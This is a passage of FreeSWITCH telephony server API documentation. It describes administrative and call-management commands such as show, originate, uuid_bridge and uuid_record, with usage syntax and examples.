\u0026ldquo;\u0026hellip;\u0026rdquo;, \u0026ldquo;data\u0026rdquo; : \u0026ldquo;\u0026hellip;\u0026rdquo;}Example\u0026gt; json {\u0026ldquo;command\u0026rdquo; : \u0026ldquo;status\u0026rdquo;, \u0026ldquo;data\u0026rdquo; : \u0026ldquo;\u0026rdquo;} 
{\u0026ldquo;command\u0026rdquo;:\u0026ldquo;status\u0026rdquo;,\u0026ldquo;data\u0026rdquo;:\u0026quot;\u0026quot;,\u0026ldquo;status\u0026rdquo;:\u0026ldquo;success\u0026rdquo;,\u0026ldquo;response\u0026rdquo;:{\u0026ldquo;systemStatus\u0026rdquo;:\u0026ldquo;ready\u0026rdquo;,\u0026ldquo;uptime\u0026rdquo;:{\u0026ldquo;years\u0026rdquo;:0,\u0026ldquo;days\u0026rdquo;:20,\u0026ldquo;hours\u0026rdquo;:20,\u0026ldquo;minutes\u0026rdquo;:37,\u0026ldquo;seconds\u0026rdquo;:4,\u0026ldquo;milliseconds\u0026rdquo;:254,\u0026ldquo;microseconds\u0026rdquo;:44},\u0026ldquo;version\u0026rdquo;:\u0026ldquo;1.6.9 -16-d574870 64bit\u0026rdquo;,\u0026ldquo;sessions\u0026rdquo;:{\u0026ldquo;count\u0026rdquo;:{\u0026ldquo;total\u0026rdquo;:132,\u0026ldquo;active\u0026rdquo;:0,\u0026ldquo;peak\u0026rdquo;:2,\u0026ldquo;peak5Min\u0026rdquo;:0,\u0026ldquo;limit\u0026rdquo;:1000},\u0026ldquo;rate\u0026rdquo;:{\u0026ldquo;current\u0026rdquo;:0,\u0026ldquo;max\u0026rdquo;:30,\u0026ldquo;peak\u0026rdquo;:2,\u0026ldquo;peak5Min\u0026rdquo;:0}},\u0026ldquo;idleCPU\u0026rdquo;:{\u0026ldquo;used\u0026rdquo;:0,\u0026ldquo;allowed\u0026rdquo;:99.733333},\u0026ldquo;stackSizeKB\u0026rdquo;:{\u0026ldquo;current\u0026rdquo;:240,\u0026ldquo;max\u0026rdquo;:8192}}} load Load external moduleUsage: load \u0026lt;mod_name\u0026gt;Example:load mod_v8 md5 Return MD5 hash for the given input dataUsage: md5 hash-keyExample:md5 freeswitch-is-awesome765715d4f914bf8590d1142b6f64342e module_exists Check if module is loaded.Usage: module_exists Example:module_exists mod_event_sockettrue msleep Sleep for x number of millisecondsUsage: msleep nat_map Manage Network Address Translation mapping.Usage: nat_map [status|reinit|republish] | [add|del] [tcp|udp] [sticky] | [mapping] \u0026lt;enable|disable\u0026gt;\nstatus - Gives the NAT type, the external IP, and the currently mapped ports. reinit - Completely re-initializes the NAT engine. 
Use this if you have changed routes or have changed your home router from NAT mode to UPnP mode. republish - Causes FreeSWITCH to republish the NAT maps. This should not be necessary in normal operation. mapping - Controls whether port mapping requests will be sent to the NAT (the command line option of -nonatmap can set it to disable on startup). This gives the ability of still using NAT for getting the public IP without opening the ports in the NAT. Note: sticky makes the mapping stay across FreeSWITCH restarts. It gives you a permanent mapping.Warning: If you have multiple network interfaces with unique IP addresses defined in sip profiles using the same port, nat_map will get confused when it tries to map the same ports for multiple profiles. Set up a static mapping between the public address and port and the private address and port in the sip_profiles to avoid this problem. regex Evaluate a regex (regular expression).Usage: regex |[|][|(n|b)]regex m://[/][/(n|b)]regex m:~~[~][~(n|b)]This command behaves differently depending upon whether or not a substitution string and optional flag is supplied:\nIf a subst is not supplied, regex returns either \u0026ldquo;true\u0026rdquo; if the pattern finds a match or \u0026ldquo;false\u0026rdquo; if not. If a subst is supplied, regex returns the subst value on a true condition. If a subst is supplied, on a false (no pattern match) condition regex returns: the source string with no flag; with the n flag regex returns null which forces the response \u0026ldquo;-ERR no reply\u0026rdquo; from regex; with the b flag regex returns \u0026ldquo;false\u0026rdquo; The regex delimiter defaults to the | (pipe) character. 
The delimiter may be changed to ~ (tilde) or / (forward slash) by prefixing the regex with m:Examples:regex test1234|\\d \u0026lt;== Returns \u0026ldquo;true\u0026rdquo;regex m:/test1234/\\d \u0026lt;== Returns \u0026ldquo;true\u0026rdquo;regex m:~test1234~\\d \u0026lt;== Returns \u0026ldquo;true\u0026rdquo;regex test|\\d \u0026lt;== Returns \u0026ldquo;false\u0026rdquo;regex test1234|(\\d+)|$1 \u0026lt;== Returns \u0026ldquo;1234\u0026rdquo;regex sip:foo@bar.baz|^sip:(.*)|$1 \u0026lt;== Returns \u0026ldquo;foo@bar.baz\u0026rdquo;regex testingonetwo|(\\d+)|$1 \u0026lt;== Returns \u0026ldquo;testingonetwo\u0026rdquo; (no match)regex m:~30~/^(10|20|40)$/~$1 \u0026lt;== Returns \u0026ldquo;30\u0026rdquo; (no match)regex m:~30~/^(10|20|40)$/~$1~n \u0026lt;== Returns \u0026ldquo;-ERR no reply\u0026rdquo; (no match)regex m:~30~/^(10|20|40)$/~$1~b \u0026lt;== Returns \u0026ldquo;false\u0026rdquo; (no match)Logic in revision 14727 if the source string matches the result then the condition was false however there was a match and it is 1001.regex 1001|/(^\\d{4}$)/|$1\nSee also Regular_Expression reload Reload a module.Usage: reload \u0026lt;mod_name\u0026gt; reloadacl Reload Access Control Lists after modifying them in autoload_configs/acl.conf.xml and as defined in extensions in the user directory conf/directory/*.xmlUsage: reloadacl [reloadxml] reloadxml Reload conf/freeswitch.xml settings after modifying configuration files.Usage: reloadxml show Display various reports, VERY useful for troubleshooting and confirming proper configuration of FreeSWITCH. 
Arguments cannot be abbreviated; they must be specified fully.Usage: show [ aliases | api | application | bridged_calls | calls [count] | channels [count|like ] | chat | codec | complete | detailed_bridged_calls | detailed_calls | dialplan | endpoint | file | interface_types | interfaces | limits | management | modules | nat_map | registrations | say | tasks | timer | ] [as xml|as delim ]XML formatted:show foo as xmlChange delimiter:show foo as delim |\naliases – list defined command aliases api – list API commands exposed by loadable modules application – list applications exposed by loadable modules, notably mod_dptools bridged_calls – deprecated, use \u0026ldquo;show calls\u0026rdquo; calls [count] – list details of currently active calls; the keyword \u0026ldquo;count\u0026rdquo; eliminates the details and only prints the total count of calls channels [count|like ] – list current channels; see Channels vs Calls count – show only the count of active channels, no details like – filter results to include only channels that contain in uuid, channel name, cid_number, cid_name, presence data fields.
chat – list chat interfaces codec – list codecs that are currently loaded in FreeSWITCH complete – list command argument completion tables detailed_bridged_calls – same as \u0026ldquo;show detailed_calls\u0026rdquo; detailed_calls – like \u0026ldquo;show calls\u0026rdquo; but with more fields dialplan – list dialplan interfaces endpoint – list endpoint interfaces currently available to FS file – list supported file format interfaces interface_types – list all interface types with a summary count of each type of interface available interfaces – enumerate all available interfaces by type, showing the module which exposes each interface limits – list database limit interfaces management – list management interfaces module – enumerate modules and the path to each nat_map – list Network Address Translation map registrations – enumerate user extension registrations say – enumerate available TTS (text-to-speech) interface modules with language supported tasks – list FS tasks timer – list timer modules Tips For Showing Calls and Channels The best way to get an understanding of all of the show calls/channels is to use them and observe the results. To display more fields:\nshow detailed_calls show bridged_calls show detailed_bridged_calls These three expand on the information shown by \u0026ldquo;show calls\u0026rdquo;. Note that \u0026ldquo;show detailed_calls\u0026rdquo; replaces \u0026ldquo;show distinct_channels\u0026rdquo;. It provides similar, but more detailed, information.
Also note that there is no \u0026ldquo;show detailed_channels\u0026rdquo; command, however using \u0026ldquo;show detailed_calls\u0026rdquo; will yield the same net result: FreeSWITCH lists detailed information about one-legged calls and bridged calls by using \u0026ldquo;show detailed_calls\u0026rdquo;, which can be quite useful while configuring and troubleshooting FS.Filtering ResultsTo filter only channels matching a specific uuid or related to a specific call, set the presence_data channel variable in the bridge or originate application to a unique string. Then you can use:show channels like footo list only those channels of interest. The like directive filters on these fields:\nuuid channel name caller id name caller id number presence_data NOTE: presence_data must be set during bridge or originate and not after the channel is established. shutdown Stop the FreeSWITCH program.Usage: shutdownThis only works from the console. To shutdown FS from an API call or fs_cli, you should use \u0026ldquo;fsctl shutdown\u0026rdquo; which offers a number of options.Shutdown from the console ignores arguments and exits immediately!\nstatus Show current FS status. Very helpful information to provide when asking questions on the mailing list or irc channel.Usage: statusfreeswitch@internal\u0026gt; statusUP 17 years, 20 days, 10 hours, 10 minutes, 31 seconds, 571 milliseconds, 721 microsecondsFreeSWITCH (Version 1.5.8b git 87751f9 2013-12-13 18:13:56Z 32bit) is ready 53987253 session(s) since startup 127 session(s) - peak 127, last 5min 253 55 session(s) per Sec out of max 60, peak 55, last 5min 253 1000 session(s) max min idle cpu 0.00/97.71 strftime_tz Displays formatted time, converted to a specific timezone. 
See /usr/share/zoneinfo/zone.tab for the standard list of Linux timezones.Usage: strftime_tz [format_string]Example:strftime_tz US/Eastern %Y-%m-%d %T unload Unload external module.Usage: unload \u0026lt;mod_name\u0026gt; version Show version of the switchUsage: version [short]Examples:freeswitch@internal\u0026gt; versionFreeSWITCH Version 1.5.8b+git~20131213T181356Z~87751f9eaf~32bit (git 87751f9 2013-12-13 18:13:56Z 32bit)freeswitch@internal\u0026gt; version short1.5.8b xml_locate Write active xml tree or specified branch to stdout.Usage: xml_locate [root | | \u0026lt;tag_attr_name\u0026gt; \u0026lt;tag_attr_val\u0026gt;]xml_locate root will return all XML being used by FreeSWITCHxml_locate : Will return the XML corresponding to the specified xml_locate directoryxml_locate configurationxml_locate dialplanxml_locate phrasesExample:xml_locate directory domain name example.comxml_locate configuration configuration name ivr.conf xml_wrap Wrap another API command in XML.Usage: xml_wrap Call Management Commands break Deprecated. See uuid_break. create_uuid Creates a new UUID and returns it as a string.Usage: create_uuid originate Originate a new call.Usageoriginate \u0026lt;call_url\u0026gt; |\u0026amp;\u0026lt;application_name\u0026gt;(\u0026lt;app_args\u0026gt;) [] [] [\u0026lt;cid_name\u0026gt;] [\u0026lt;cid_num\u0026gt;] [\u0026lt;timeout_sec\u0026gt;]\nFreeSWITCH will originate a call to \u0026lt;call_url\u0026gt; as Leg A. If that leg supervises within 60 seconds FS will continue by searching for an extension definition in the specified dialplan for or else execute the application that follows the \u0026amp; along with its arguments.Originate Arguments Arguments \u0026lt;call_url\u0026gt; URL you are calling. 
For more info on sofia SIP URL syntax see: FreeSwitch Endpoint Sofia Destination, one of: Destination number to search in dialplan; note that registered extensions will fail this way, use \u0026amp;bridge(user/xxxx) instead \u0026amp;\u0026lt;application_name\u0026gt;(\u0026lt;app_args\u0026gt;) \u0026ldquo;\u0026amp;\u0026rdquo; indicates what follows is an application name, not an exten (\u0026lt;app_args\u0026gt;) is optional (not all applications require parameters, e.g. park) The most commonly used application names include:park, bridge, javascript/lua/perl, playback (remove mod_native_file). Note: Use single quotes to pass arguments with spaces, e.g. \u0026lsquo;\u0026amp;lua(test.lua arg1 arg2)\u0026rsquo; Note: There is no space between \u0026amp; and the application name Defaults to \u0026lsquo;XML\u0026rsquo; if not specified. Defaults to \u0026lsquo;default\u0026rsquo; if not specified. \u0026lt;cid_name\u0026gt; CallerID name to send to Leg A. \u0026lt;cid_num\u0026gt; CallerID number to send to Leg A. \u0026lt;timeout_sec\u0026gt; Timeout in seconds; default = 60 seconds. Originate Variables Variables These variables can be prepended to the dial string inside curly braces and separated by commas. Example:originate {sip_auto_answer=true,return_ring_ready=false}user/1001 9198Variables within braces must be separated by a comma.\ngroup_confirm_key group_confirm_file forked_dial fail_on_single_reject ignore_early_media - must be defined on Leg B in bridge or originate command to stop remote ringback from being heard by Leg A return_ring_ready originate_retries originate_retry_sleep_ms origination_caller_id_name origination_caller_id_number originate_timeout sip_auto_answer Description of originate\u0026rsquo;s related variables Originate Examples Examples You can call a locally registered sip endpoint 300 and park the call like so Note that the \u0026ldquo;example\u0026rdquo; profile used here must be the one to which 300 is registered. 
Also note the use of % instead of @ to indicate that it is a registered extension.originate sofia/example/300%pbx.internal \u0026amp;park()Or you could instead connect a remote sip endpoint to extension 8600originate sofia/example/300@foo.com 8600Or you could instead connect a remote SIP endpoint to another remote extensionoriginate sofia/example/300@foo.com \u0026amp;bridge(sofia/example/400@bar.com)Or you could even run a Javascript application test.jsoriginate sofia/example/1000@somewhere.com \u0026amp;javascript(test.js)To run a javascript with arguments you must surround it in single quotes.originate sofia/example/1000@somewhere.com \u0026lsquo;\u0026amp;javascript(test.js myArg1 myArg2)\u0026rsquo;Setting channel variables to the dial stringoriginate {ignore_early_media=true}sofia/mydomain.com/18005551212@1.2.3.4 15555551212Setting SIP header variables to send to another FS box during originateoriginate {sip_h_X-varA=111,sip_h_X-varB=222}sofia/mydomain.com/18005551212@1.2.3.4 15555551212Note: you can set any channel variable, even custom ones. 
Use single quotes to enclose values with spaces, commas, etc.originate {my_own_var=my_value}sofia/mydomain.com/that.ext@1.2.3.4 15555551212originate {my_own_var=\u0026lsquo;my value'}sofia/mydomain.com/that.ext@1.2.3.4 15555551212If you need to fake the ringback to the originated endpoint try this:originate {ringback='%(2000,4000,440.0,480.0)'}sofia/example/300@foo.com \u0026amp;bridge(sofia/example/400@bar.com)To specify a parameter to the Leg A call and the Leg B bridge application:originate {\u0026lsquo;origination_caller_id_number=2024561000\u0026rsquo;}sofia/gateway/whitehouse.gov/2125551212 \u0026amp;bridge([\u0026rsquo;effective_caller_id_number=7036971379\u0026rsquo;]sofia/gateway/pentagon.gov/3035554499)\nIf you need to make originate return immediately when the channel is in \u0026ldquo;Ring-Ready\u0026rdquo; state try this:originate {return_ring_ready=true}sofia/gateway/someprovider/919246461929 \u0026amp;socket(\u0026lsquo;127.0.0.1:8082 async full\u0026rsquo;)More info on return_ring_readyYou can even set music on hold for the ringback if you want:originate {ringback='/path/to/music.wav'}sofia/gateway/name/number \u0026amp;bridge(sofia/gateway/siptoshore/12425553741)You can originate a call in the background (asynchronously) and playback a message with a 60 second timeout.bgapi originate {ignore_early_media=true,originate_timeout=60}sofia/gateway/name/number \u0026amp;playback(message)You can specify the UUID of an originated call by doing the following:\nUse create_uuid to generate a UUID to use. This will allow you to kill an originated call before it is answered by using uuid_kill. If you specify origination_uuid it will remain the UUID for the answered call leg for the whole session. 
originate {origination_uuid=...}user/100@domain.name.comHere\u0026rsquo;s an example of originating a call to the echo conference (an external sip URL) and bridging it to a local user\u0026rsquo;s phone:originate sofia/internal/9996@conference.freeswitch.org \u0026amp;bridge(user/105@default)Here\u0026rsquo;s an example of originating a call to an extension in a different context than \u0026lsquo;default\u0026rsquo; (required for the FreePBX which uses context_1, context_2, etc.):originate sofia/internal/2001@foo.com 3001 xml context_3You can also originate to multiple extensions as follows:originate user/1001,user/1002,user/1003 \u0026amp;park()To put an outbound call into a conference at early media, either of these will work (they are effectively the same thing)originate sofia/example/300@foo.com \u0026amp;conference(conf_uuid-TEST_CON)originate sofia/example/300@foo.com conference:conf_uuid-TEST_CON inlineSee mod_dptools: Inline Dialplan for more detail on \u0026lsquo;inline\u0026rsquo; DialplansAn example of using loopback and inline on the A-leg can be found in this mailing list post pause Pause playback of recorded media that was started with uuid_broadcast.Usagepause \u0026lt;on|off\u0026gt;Turning pause \u0026ldquo;on\u0026rdquo; activates the pause function, i.e. it pauses the playback of recorded media. Turning pause \u0026ldquo;off\u0026rdquo; deactivates the pause function and resumes playback of recorded media at the same point where it was paused.Note: always returns -ERR no reply when successful; returns -ERR No such channel! when uuid is invalid. 
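The {var=value,...} prefix that the originate examples above prepend to a dial string can be sketched with a small builder. This is a hypothetical helper of my own, not a FreeSWITCH API; it follows the documented rules that variables are comma-separated inside curly braces and that values containing spaces or commas are single-quoted.

```python
def dial_string(url, **variables):
    # Channel variables go inside {} before the URL, comma-separated;
    # values with spaces or commas are wrapped in single quotes.
    if not variables:
        return url

    def fmt(value):
        value = str(value)
        if " " in value or "," in value:
            return f"'{value}'"
        return value

    pairs = ",".join(f"{name}={fmt(value)}" for name, value in variables.items())
    return "{" + pairs + "}" + url

print(dial_string("sofia/mydomain.com/18005551212@1.2.3.4",
                  ignore_early_media="true"))
# {ignore_early_media=true}sofia/mydomain.com/18005551212@1.2.3.4
print(dial_string("sofia/mydomain.com/that.ext@1.2.3.4",
                  my_own_var="my value"))
# {my_own_var='my value'}sofia/mydomain.com/that.ext@1.2.3.4
```

The same string would then be handed to originate (or bgapi originate) exactly as in the examples above.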
uuid_answer Answer a channelUsageuuid_answer See Also\nmod_dptools: answer uuid_audio Adjust the audio levels on a channel or mute (read/write) via a media bug.Usageuuid_audio [start [read|write] [[mute|level] ]|stop] is in the range from -4 to 4, 0 being the default value.Level is required for both mute|level params:freeswitch@internal\u0026gt; uuid_audio 0d7c3b93-a5ae-4964-9e4d-902bba50bd19 start write mute freeswitch@internal\u0026gt; uuid_audio 0d7c3b93-a5ae-4964-9e4d-902bba50bd19 start write level (This command behaves funky. Requires further testing to vet all arguments. - JB)See Also\nmod_dptools: set audio level uuid_break Break out of media being sent to a channel. For example, if an audio file is being played to a channel, issuing uuid_break will discontinue the media and the call will move on in the dialplan, script, or whatever is controlling the call.Usage: uuid_break [all]If the all flag is used then all audio files/prompts/etc. that are queued up to be played to the channel will be stopped and removed from the queue, otherwise only the currently playing media will be stopped. uuid_bridge Bridge two call legs together.Usageuuid_bridge \u0026lt;other_uuid\u0026gt;uuid_bridge needs at least any one leg to be in the answered state. If, for example, one channel is parked and another channel is actively conversing on a call, executing uuid_bridge on these 2 channels will drop the existing call and bridge together the specified channels. uuid_broadcast Execute an arbitrary dialplan application, typically playing a media file, on a specific uuid. If a filename is specified then it is played into the channel(s). 
To execute an application use \u0026ldquo;app::args\u0026rdquo; syntax.Usageuuid_broadcast [aleg|bleg|both]Execute an application on a chosen leg(s) with optional hangup afterwards:Usageuuid_broadcast app[![hangup_cause]]::args [aleg|bleg|both]Examples:Exampleuuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e sorry.wav bothuuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e say::en\\snumber\\spronounced\\s12345 aleguuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e say!::en\\snumber\\spronounced\\s12345 aleguuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e say!user_busy::en\\snumber\\spronounced\\s12345 aleguuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e playback!user_busy::sorry.wav aleg uuid_buglist List the media bugs on channel. Output is formatted as XML.Usage\nuuid_buglist uuid_chat Send a chat message.Usageuuid_chat If the endpoint associated with the session has a receive_event handler, this message gets sent to that session and is interpreted as an instant message. uuid_debug_media Debug media, either audio or video.Usageuuid_debug_media \u0026lt;read|write|both|vread|vwrite|vboth\u0026gt; \u0026lt;on|off\u0026gt;Use \u0026ldquo;read\u0026rdquo; or \u0026ldquo;write\u0026rdquo; for the audio direction to debug, or \u0026ldquo;both\u0026rdquo; for both directions. And prefix with v for video media.uuid_debug_media emits a HUGE amount of data. 
If you invoke this command from fs_cli, be prepared.\nExample outputR sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=2981605109 m=0W sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=12212960 m=0R sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=2981605269 m=0W sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=12213120 m=0 Read Format \u0026ldquo;R %s b=%4ld %s:%u %s:%u %s:%u pt=%d ts=%u m=%d\\n\u0026rdquo;where the values are:\nswitch_channel_get_name(switch_core_session_get_channel(session)), (long) bytes, my_host, switch_sockaddr_get_port(rtp_session-\u0026gt;local_addr), old_host, rtp_session-\u0026gt;remote_port, tx_host, switch_sockaddr_get_port(rtp_session-\u0026gt;from_addr), rtp_session-\u0026gt;recv_msg.header.pt, ntohl(rtp_session-\u0026gt;recv_msg.header.ts), rtp_session-\u0026gt;recv_msg.header.m Write Format \u0026ldquo;W %s b=%4ld %s:%u %s:%u %s:%u pt=%d ts=%u m=%d\\n\u0026rdquo;where the values are:\nswitch_channel_get_name(switch_core_session_get_channel(session)), (long) bytes, my_host, switch_sockaddr_get_port(rtp_session-\u0026gt;local_addr), old_host, rtp_session-\u0026gt;remote_port, tx_host, switch_sockaddr_get_port(rtp_session-\u0026gt;from_addr), send_msg-\u0026gt;header.pt, ntohl(send_msg-\u0026gt;header.ts), send_msg-\u0026gt;header.m); uuid_deflect Deflect an answered SIP call off of FreeSWITCH by sending the REFER methodUsage: uuid_deflect uuid_deflect waits for the final response from the far end to be reported. It returns the sip fragment from that response as the text in the FreeSWITCH response to uuid_deflect. 
If the far end reports the REFER was successful, then FreeSWITCH will issue a bye on the channel.Exampleuuid_deflect 0c9520c4-58e7-40c4-b7e3-819d72a98614 sip:info@example.netResponse:Content-Type: api/responseContent-Length: 30+OK:SIP/2.0 486 Busy Here uuid_displace Displace the audio for the target with the specified audio .Usage: uuid_displace [start|stop] [] [mux]Arguments:\nuuid = Unique ID of this call (see \u0026lsquo;show channels\u0026rsquo;) start|stop = Start or stop this action file = path to an audio source (.wav file, shoutcast stream, etc\u0026hellip;) limit = limit number of seconds before terminating the displacement mux = multiplex; mix the original audio together with \u0026lsquo;file\u0026rsquo;, i.e. both parties can still converse while the file is playing (if the level is not too loud) To specify the 5th argument \u0026lsquo;mux\u0026rsquo; you must specify a limit; if no time limit is desired on playback, then specify 0.Examplescli\u0026gt; uuid_displace 1a152be6-2359-11dc-8f1e-4d36f239dfb5 start /sounds/test.wav 60cli\u0026gt; uuid_displace 1a152be6-2359-11dc-8f1e-4d36f239dfb5 stop /sounds/test.wav\nuuid_display Updates the display on a phone if the phone supports this. This works on some SIP phones right now including Polycom and Snom.Usage: name|numberNote the pipe character separating the Caller ID name and Caller ID number.This command makes the phone re-negotiate the codec. The SIP -\u0026gt; RTP Packet Size should be 0.020 seconds. If it is set to 0.030 on the Cisco SPA series phones it causes a DTMF lag. 
When DTMF keys are pressed on the phone they can be seen on the fs_cli 4-6 seconds late.Example:freeswitch@sidious\u0026gt; uuid_display f4053af7-a3b9-4c78-93e1-74e529658573 Fred Jones|1001+OK Success\nuuid_dual_transfer Transfer each leg of a call to different destinations.Usage: [/][/] [/][/] uuid_dump Dumps all variable values for a session.Usage: uuid_dump [format]Format options: txt (default, may be omitted), XML, JSON, plain uuid_early_ok Stops the process of ignoring early media, i.e. if ignore_early_media=true, this stops ignoring early media coming from Leg B and responds normally.Usage: uuid_early_ok uuid_exists Checks whether a given UUID exists.Usage: uuid_exists Returns true or false. uuid_flush_dtmf Flush queued DTMF digitsUsage: uuid_flush_dtmf uuid_fileman Manage the audio being played into a channel from a sound fileUsage: uuid_fileman cmd:valCommands are:\nspeed:\u0026lt;+[step]\u0026gt;|\u0026lt;-[step]\u0026gt; volume:\u0026lt;+[step]\u0026gt;|\u0026lt;-[step]\u0026gt; pause (toggle) stop truncate restart seek:\u0026lt;+[milliseconds]\u0026gt;|\u0026lt;-[milliseconds]\u0026gt; (1000ms = 1 second, 10000ms = 10 seconds.) Example to seek forward 30 seconds:uuid_fileman 0171ded1-2c31-445a-bb19-c74c659b7d08 seek:+30000(Or use the current channel via ${uuid}, e.g. in a bind_digit_action)The \u0026lsquo;pause\u0026rsquo; argument is a toggle: the first time it is invoked it will pause playback, the second time it will resume playback. uuid_getvar Get a variable from a channel.Usage: uuid_getvar uuid_hold Place a channel on hold.Usage:uuid_hold place a call on holduuid_hold off switch off on holduuid_hold toggle toggles call-state based on current call-state uuid_kill Reset a specific channel.Usage: uuid_kill [cause]If no cause code is specified, NORMAL_CLEARING will be used.
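The seek values used by uuid_fileman above are plain millisecond offsets. As a minimal sketch (the helper name and the use of Python are my own, not part of FreeSWITCH), an API string for seeking by whole seconds could be assembled like this:

```python
def fileman_seek(uuid: str, seconds: int) -> str:
    """Build a uuid_fileman seek command; FreeSWITCH expects milliseconds.

    Hypothetical convenience helper -- not part of FreeSWITCH itself.
    """
    ms = seconds * 1000
    sign = "+" if ms >= 0 else "-"
    return f"uuid_fileman {uuid} seek:{sign}{abs(ms)}"

# Seek forward 30 seconds (30000 ms) on a channel:
print(fileman_seek("0171ded1-2c31-445a-bb19-c74c659b7d08", 30))
```

The resulting string can then be sent over the event socket or pasted into fs_cli.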
uuid_limit Apply or change limit(s) on a specified uuid.Usage: uuid_limit [[/interval]] [number [dialplan [context]]]See also mod_dptools: Limit uuid_media Reinvite FreeSWITCH out of the media path:Usage: uuid_media [off] Reinvite FreeSWITCH back in:Usage: uuid_media uuid_media_reneg Tell a channel to send a re-invite with optional list of new codecs to be renegotiated.Usage: uuid_media_reneg \u0026lt;=\u0026gt;Example: Adding =PCMU makes the offered codec string absolute. uuid_park Park callUsage: uuid_park The specified channel will be parked and the other leg of the call will be disconnected. uuid_pre_answer Pre-answer a channel.Usage: uuid_preanswer See Also: Misc._Dialplan_Tools_pre_answer uuid_preprocess Pre-process ChannelUsage: uuid_preprocess uuid_recv_dtmf Usage: uuid_recv_dtmf \u0026lt;dtmf_data\u0026gt;\nuuid_send_dtmf Send DTMF digits to Usage: uuid_send_dtmf [@\u0026lt;tone_duration\u0026gt;]Use the character w for a .5 second delay and the character W for a 1 second delay.Default tone duration is 2000ms. uuid_send_info Send info to the endpointUsage: uuid_send_info uuid_session_heartbeat Usage: uuid_session_heartbeat [sched] [0|] uuid_setvar Set a variable on a channel. If value is omitted, the variable is unset.Usage: uuid_setvar [value] uuid_setvar_multi Set multiple vars on a channel.Usage: uuid_setvar_multi =[;=[;\u0026hellip;]] uuid_simplify This command directs FreeSWITCH to remove itself from the SIP signaling path if it can safely do so.Usage: uuid_simplify Execute this API command to instruct FreeSWITCH™ to inspect the Leg A and Leg B network addresses. If they are both hosted by the same switch as a result of a transfer or forwarding loop across a number of FreeSWITCH™ systems the one executing this command will remove itself from the SIP and media path and restore the endpoints to their local FreeSWITCH™ to shorten the network path.
This is particularly useful in large distributed FreeSWITCH™ installations.For example, suppose a call arrives at a FreeSWITCH™ box in Los Angeles, is answered, then forwarded to a FreeSWITCH™ box in London, answered there and then forwarded back to Los Angeles. The London switch could execute uuid_simplify to tell its local switch to examine both legs of the call to determine that they could be hosted by the Los Angeles switch since both legs are local to it. Alternatively, setting sip_auto_simplify to true either globally in vars.xml or as part of a dialplan extension would tell FS to perform this check for each call when both legs supervise. uuid_transfer Transfers an existing call to a specific extension within a and . Dialplan may be \u0026ldquo;xml\u0026rdquo; or \u0026ldquo;directory\u0026rdquo;.Usageuuid_transfer [-bleg|-both] [] []\nThe optional first argument will allow you to transfer both parties (-both) or only the party to whom is talking (-bleg). Beware that -bleg actually means \u0026ldquo;the other leg\u0026rdquo;, so when it is executed on the actual B leg uuid it will transfer the actual A leg that originated the call and disconnect the actual B leg.NOTE: if the call has been bridged, and you want to transfer either side of the call, then you will need to use (or the API equivalent). If it\u0026rsquo;s not set, transfer doesn\u0026rsquo;t really work as you\u0026rsquo;d expect, and leaves calls in limbo.For more examples see Inline Dialplan uuid_phone_event Send hold indication upstream:Usageuuid_phone_event hold|talk\nRecord/Playback Commands uuid_record Record the audio associated with the given UUID into a file. The start command causes FreeSWITCH to start mixing all call legs together and saves the result as a file in the format that the file\u0026rsquo;s extension dictates. (if available) The stop command will stop the recording and close the file.
If media setup hasn\u0026rsquo;t yet happened, the file will contain silent audio until media is available. Audio will be recorded for calls that are parked. The recording will continue through the bridged call. If the call is set to return to park after the bridge, the bug will remain on the call, but no audio is recorded until the call is bridged again. (TODO: What if media doesn\u0026rsquo;t flow through FreeSWITCH? Will it re-INVITE first? Or do we just not get the audio in that case?)Usage:uuid_record [start|stop|mask|unmask] []Where limit is the max number of seconds to record.If the path is not specified on start it will default to the channel variable \u0026ldquo;sound_prefix\u0026rdquo; or FreeSWITCH base_dir when the \u0026ldquo;sound_prefix\u0026rdquo; is empty.You may also specify \u0026ldquo;all\u0026rdquo; for path when stop is used to remove all for this uuid\u0026ldquo;stop\u0026rdquo; command must be followed by option.\u0026ldquo;mask\u0026rdquo; will mask with silence part of the recording beginning when the mask argument is executed by this command. see http://jira.freeswitch.org/browse/FS-5269.\u0026ldquo;unmask\u0026rdquo; will stop the masking and continue recording live audio normally.See record\u0026rsquo;s related variablesyou will also want to see mod_dptools: record_session Limit Commands More information is available at Limit commands limit_reset Reset a limit backend. limit_status Retrieve status from a limit backend. limit_usage Retrieve usage for a given resource. uuid_limit_release Manually decrease a resource usage by one. limit_interval_reset Reset the interval counter to zero prior to the start of the next interval. 
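Because uuid_record takes several positional arguments with different rules per action, scripts that drive it benefit from a small validator. This is a hedged sketch (the wrapper function is hypothetical, not a FreeSWITCH API):

```python
def uuid_record_cmd(uuid, action, path="", limit=None):
    """Assemble a uuid_record API string:
    uuid_record <uuid> [start|stop|mask|unmask] <path> [<limit>]

    Hypothetical helper; `limit` is the max number of seconds to record.
    """
    if action not in ("start", "stop", "mask", "unmask"):
        raise ValueError(f"unsupported action: {action}")
    parts = ["uuid_record", uuid, action]
    if path:
        parts.append(path)
    if limit is not None:
        parts.append(str(limit))
    return " ".join(parts)

# Start recording with a 60-second cap, then stop; "all" removes every
# recording bug for the uuid, as described above:
print(uuid_record_cmd("1a152be6-2359-11dc-8f1e-4d36f239dfb5", "start", "/tmp/call.wav", 60))
print(uuid_record_cmd("1a152be6-2359-11dc-8f1e-4d36f239dfb5", "stop", "all"))
```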
